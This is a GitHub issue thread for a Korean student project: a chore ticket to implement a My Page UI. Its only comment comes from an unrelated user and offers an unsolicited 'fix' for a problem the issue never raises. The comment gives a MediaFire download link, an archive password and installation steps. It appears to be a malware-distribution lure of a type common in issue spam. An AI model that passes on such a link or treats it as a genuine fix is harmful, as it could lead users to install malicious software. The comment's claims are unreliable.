### ISSUE TITLE
[Chore] MyPage

### ISSUE THREAD

**Issue by jaminleee** [9oormthon-univ/9oormthon_univ#21]
## 🛠 Issue
마이페이지 UI 구현

## 📝 To-do

- [ ] 마이페이지 UI 구현

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
